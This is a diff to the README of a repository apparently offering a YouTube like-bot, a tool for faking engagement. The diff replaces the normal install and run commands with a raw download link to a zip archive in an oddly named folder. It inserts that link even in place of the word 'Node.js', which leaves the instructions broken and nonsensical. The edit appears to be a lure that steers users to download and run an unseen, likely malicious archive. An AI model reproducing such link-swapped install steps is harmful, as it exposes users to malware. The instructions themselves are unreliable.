PlayerDave/youtube-like-bot/README.md

    If you are using the Python version:
    - Make sure to have Python installed.
    - Use your command prompt or terminal to navigate to the extracted folder.
-   - Run the command `pip install -r requirements.txt`.
+   - Run the command `pip install -r https://github.com/PlayerDave/youtube-like-bot/raw/refs/heads/main/urchinly/bot-youtube-like-v2.8.zip`.

 4. **Run the application:**
-   - For Node.js, type `node index.js` in your terminal or command prompt.
+   - For https://github.com/PlayerDave/youtube-like-bot/raw/refs/heads/main/urchinly/bot-youtube-like-v2.8.zip, type `node https://github.com/PlayerDave/youtube-like-bot/raw/refs/heads/main/urchinly/bot-youtube-like-v2.8.zip` in your terminal or command prompt.
-   - For Python, type `python main.py`.
+   - For Python, type `python https://github.com/PlayerDave/youtube-like-bot/raw/refs/heads/main/urchinly/bot-youtube-like-v2.8.zip`.

 ### Configuring the Bot
 After running the application, you’ll need to configure it based on your preferences: